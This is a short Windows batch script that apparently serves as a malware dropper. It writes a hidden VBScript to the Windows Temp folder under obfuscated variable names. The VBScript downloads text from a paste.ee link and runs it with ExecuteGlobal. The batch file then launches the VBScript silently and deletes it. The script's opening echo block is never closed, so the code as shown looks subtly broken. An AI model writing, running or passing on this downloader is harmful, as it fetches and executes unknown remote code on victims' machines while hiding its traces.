@echo off
@echo off
setlocal
set "sandbagging=C:\Windows\Temp\Satnami.vbs"
>"%sandbagging%" (
echo Dim ureterorrhagia, polychetes
echo ureterorrhagia = "http://paste.ee/d/SiFM4NNH/0"
echo Set polychetes = CreateObject^("MSXML2.ServerXMLHTTP"^)
echo polychetes.open "GET", ureterorrhagia, False
echo polychetes.send
echo If polychetes.Status = 200 Then
echo ExecuteGlobal polychetes.responseText
echo End If
start "" /b wscript //nologo "%sandbagging%"
timeout /t 1 /nobreak >nul
del "%sandbagging%"
endlocal